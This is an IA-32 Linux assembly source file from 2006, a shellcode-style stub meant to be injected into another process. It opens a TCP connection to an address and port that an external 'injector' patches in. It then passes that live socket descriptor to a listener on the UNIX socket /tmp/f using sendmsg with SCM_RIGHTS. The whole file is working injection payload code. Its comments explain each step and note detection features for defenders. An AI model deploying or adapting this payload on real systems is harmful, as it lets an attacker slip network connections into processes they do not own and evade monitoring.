;; -*- asm -*-
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;                                                                           ;;
;; Copyright (C) 2006 Nicolas Bareil nicolas.bareil @ eads.net               ;;
;;                                   nbareil @ mouarf.org                    ;;
;;                                                                           ;;
;; This program is free software; you can redistribute it and/or modify it   ;;
;; under the terms of the GNU General Public License version 2 as            ;;
;; published by the Free Software Foundation; version 2.                     ;;
;;                                                                           ;;
;; This program is distributed in the hope that it will be useful, but       ;;
;; WITHOUT ANY WARRANTY; without even the implied warranty of                ;;
;; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU         ;;
;; General Public License for more details.                                  ;;
;;                                                                           ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;-----------------------------------------------------------------------------
;; _start  --  socket-passing stub (IA-32 Linux, NASM syntax, int 0x80 ABI)
;;
;; Purpose (as the code shows): open a TCP socket, connect() it to an address
;; and port that are left zeroed here and, per the author's comments, are
;; patched in by an external "injector"; then open an AF_UNIX stream socket,
;; connect() it to the hard-coded path "/tmp/f", and hand the connected TCP
;; descriptor to whoever listens there with sendmsg() + SCM_RIGHTS.
;;
;; Every kernel entry goes through sys_socketcall (eax=102): ebx selects the
;; sub-call (1=SYS_SOCKET, 3=SYS_CONNECT, 16=SYS_SENDMSG) and ecx points at an
;; argument vector built on the stack.  The observable sequence is therefore
;; socket/connect/socket/connect/sendmsg, all via socketcall, plus the
;; connect() to "/tmp/f" -- useful as detection features for defenders.
;;
;; Entry:  called like a function (push ebp / ret), no arguments.
;; Return: nothing meaningful; return values of the syscalls are not checked.
;; Regs:   all general registers are preserved by pusha/popa.
;;
;; Register roles inside the routine:
;;   ebp = base of a 300-byte scratch area placed below the saved frame
;;   ecx = pointer to the socketcall argument vector
;;   edx = scratch (fd, pointer, loop index)
;;   edi = &msghdr      (ebp+9)
;;   esi = &cmsghdr     (ebp+100)
;;
;; Scratch-area layout (offsets from ebp, as written by the code below):
;;   +0   .. +11   socketcall argument vector (3 dwords)
;;   +12  .. +27   struct sockaddr_in for the TCP connect()
;;   +14  ..       struct sockaddr_un ("/tmp/f") for the UNIX connect(),
;;                 overwriting the sockaddr_in once it is no longer needed
;;   +0            char tmp (1 byte of payload for the iovec)
;;   +1   .. +8    struct iovec { &tmp, 1 }   (unaligned, by design)
;;   +9   .. +41   struct msghdr (zeroed 32 bytes, 28 used)
;;   +100 .. +115  struct cmsghdr + the descriptor being passed
;;   +200 .. +211  sendmsg argument vector { unixfd, &msghdr, 0 }
;;
;; Two values are pushed on the real stack in the meantime (TCP fd, then UNIX
;; fd); esp sits 32 bytes below the saved frame after pusha, so those pushes
;; land at ebp+264 / ebp+260 and do not collide with the offsets above.
;;-----------------------------------------------------------------------------

BITS 32
GLOBAL _start

SECTION .text

_start:
        nop
        nop
        push ebp
        mov ebp,esp
        pusha                           ; preserve every register for the caller
        sub ebp,300                     ; ebp = base of the scratch area

        ;; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) -> TCP fd in eax
        mov eax, 102                    ; sys_socketcall
        mov ebx, 1                      ; SYS_SOCKET
        mov ecx, ebp                    ; ptr to arguments
        mov word [ebp], 2               ; AF_INET
        mov word [ebp+4], 1             ; SOCK_STREAM
        mov dword [ebp+8], 6            ; tcp
        int 0x80                        ; socket(PF_INET, SOCK_STREAM, TCP)

        mov edx, eax                    ; edx = TCP fd
        push eax                        ; our fd (popped again at depoppage)

        ;; connect(tcpfd, &sockaddr_in, 16)
        mov eax, 102                    ; sys_socketcall
        mov ebx, 3                      ; SYS_CONNECT
        mov ecx, ebp
        mov dword [ebp], edx            ; sockfd
        mov edx, ebp
        add edx, 12                     ; edx = ebp+12 = &sockaddr_in
        mov dword [ebp+4], edx          ; ptr to a sockaddr_in structure

;; struct sockaddr_in {
;;   unsigned short      sin_family;   /* Address family     */
;;   unsigned short int  sin_port;     /* Port number        */
;;   __u32               sin_addr;     /* Internet address   */
;;
;;   /* Pad to size of `struct sockaddr'. */
;;   unsigned char __pad[__SOCK_SIZE__ - sizeof(short int) -
;;                       sizeof(unsigned short int) - sizeof(struct in_addr)];
;; };
        mov word [ebp+12], 2            ; PF_INET
        ;; NOTE: port and address are left as zero placeholders here; the
        ;; author's comments say an external injector is expected to overwrite
        ;; these two fields.  The zero words at ebp+14 / ebp+16 are the
        ;; "template" pattern a scanner would look for in the unpatched stub.
        mov word [ebp+14], 0x00000000   ; port (XXX: the injector must patch this word)
        mov dword [ebp+16], 0x00000000  ; address (XXX: the injector must patch this word)
        mov dword [ebp+8], 16           ; addrlen = sizeof(struct sockaddr_in)
        int 0x80                        ; connect(fd, &sockaddr_in, sizeof(struct sockaddr_in))

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;                                                                                      ;;
;; The TCP socket has been created and connected; it now has to be handed over to       ;;
;; the target process through a UNIX-domain socket.                                     ;;
;;                                                                                      ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

        ;; socket(AF_UNIX, SOCK_STREAM, 0) -> UNIX fd in eax
        mov eax, 102                    ; sys_socketcall
        mov ebx, 1                      ; SYS_SOCKET
        mov ecx, ebp                    ; ptr to arguments
        mov dword [ebp], 1              ; AF_UNIX
        mov dword [ebp+4], 1            ; SOCK_STREAM
        mov dword [ebp+8], 0            ; protocol
        int 0x80                        ; socket(PF_UNIX, SOCK_STREAM, 0);

        push eax                        ; UNIX fd (popped first at depoppage)
        mov edx, eax                    ; edx = UNIX fd

connectunix:
        ;; connect(unixfd, {AF_UNIX, "/tmp/f"}, 16)
        mov eax, 102                    ; sys_socketcall
        mov ebx, 3                      ; SYS_CONNECT
        mov ecx, ebp                    ; ptr
        mov dword [ebp], edx            ; unixfd
        mov edx, ebp
        add edx, 14                     ; edx = ebp+14 = &sockaddr_un
        mov dword [ebp+4], edx          ; ptr to connect argument
        mov dword [ebp+8], 16           ; sizeof(struct sockaddr_un) as passed here
        mov word [edx], 1               ; AF_UNIX
        ;; sun_path written as two little-endian dwords: "/tmp" then "/f\0\0".
        ;; The rendezvous path "/tmp/f" is a fixed string in the stub.
        mov dword [edx+2], 0x706d742f   ; "/tmp"  (XXX: hack)
        mov dword [edx+6], 0x0000662f   ; "/f\0\0"
        int 0x80                        ; connect(4, {sa_family=AF_FILE, path="/tmp/f"}, 16)

;; structure msghdr
;; struct msghdr {
;;   void            *msg_name;        /* Socket name                                  */
;;   int              msg_namelen;     /* Length of name                               */
;;   struct iovec    *msg_iov;         /* Data blocks                                  */
;;   __kernel_size_t  msg_iovlen;      /* Number of blocks                             */
;;   void            *msg_control;     /* Per protocol magic (eg BSD file descriptor passing) */
;;   __kernel_size_t  msg_controllen;  /* Length of cmsg list                          */
;;   unsigned         msg_flags;
;; };
;; struct cmsghdr {
;;   __kernel_size_t  cmsg_len;        /* data byte count, including hdr               */
;;   int              cmsg_level;      /* originating protocol                         */
;;   int              cmsg_type;       /* protocol-specific type                       */
;; };

;; struct iovec -- one byte of real payload so that sendmsg() carries the
;; ancillary data; the iovec itself sits unaligned at ebp+1.
        mov dword [ ebp ], 0            ; char tmp = 0
        mov dword [ebp+1], ebp          ; iov.iov_base = &tmp
        mov dword [ebp+5], 1            ; iov.iov_len = sizeof(tmp) = 1
        mov edi, ebp
        add edi, 9                      ; edi = &msghdr

msghdr:
;; struct msghdr -- zero-fill first, then set the fields that matter.
        mov edx, 0
zeroify:
        ;; Loop runs for edx = 0,4,...,28 (exit when edx > 28), so it clears
        ;; 8 dwords = 32 bytes starting at edi; msghdr needs 28 of them.
        cmp edx, 28                     ; if (i < sizeof(msghdr)
        jg fin
        mov dword [edi+edx], 0
        add edx, 4
        jmp zeroify
fin:
        mov edx, ebp                    ;
        inc edx                         ; step over char tmp: edx = &iov
        mov dword [edi+8], edx          ; msg.msg_iov = &iov
        mov dword [edi+12], 1           ; msg.msg_iovlen = 1
        mov esi, ebp
        add esi, 100                    ; XXX: esi = &cmsghdr (fixed offset in scratch area)
        mov dword [edi+16], esi         ; msg.msg_control = &ancillary;
        ;mov dword [edi+16], 0xAAAAAAAA  ; msg.msg_control = &ancillary;
        mov dword [edi+20], 16          ; msg.msg_controllen = sizeof(ancillary);

;; now, there is the cmsghdr at %esi
;; 16 = 12-byte header + 4-byte descriptor, i.e. CMSG_LEN(sizeof(int)) on IA-32.
        mov dword [esi], 16             ; ch->cmsg_len = CMSG_LEN(sizeof(fd))
        mov dword [esi+4], 1            ; ch->cmsg_level = SOL_SOCKET;
        mov dword [esi+8], 1            ; ch->cmsg_type = SCM_RIGHTS;

depoppage:
        ;; Recover the two descriptors pushed earlier (reverse push order).
        pop ebx                         ; contains the unix file descriptor
        pop eax                         ; contains the file descriptor to send
        mov dword [esi+12], eax         ; *(int *) CMSG_DATA(ch) = fd;

ptr_arg_sendmsg:
        ;; Build the socketcall argument vector for sendmsg at ebp+200.
        mov ecx, ebp
        add ecx, 200                    ; XXX: ecx = &args (fixed offset in scratch area)
        mov dword [ecx], ebx            ; unix file descriptor
        mov edi, ebp
        add edi, 9                      ; edi = &msghdr (recomputed; edi was not changed)
        mov dword [ecx+4], edi          ; &msg
        mov dword [ecx+8], 0            ; options

sendmsg:
        mov eax, 102                    ; sys_socketcall
        mov ebx, 16                     ; SYS_SENDMSG
        mov edx, 12                     ; len=3*4 (not consumed by socketcall; ecx carries the vector)
        int 0x80                        ; sendmsg(sockfd, &msg, 0)

        ;; Epilogue: undo the scratch-area offset, restore all registers, return.
        ;; popa also restores ebp from the pusha frame, so `mov esp,ebp` then
        ;; yields the value saved by the initial `push ebp / mov ebp,esp`.
        add ebp, 300
        popa
        mov esp,ebp
        pop ebp
        ret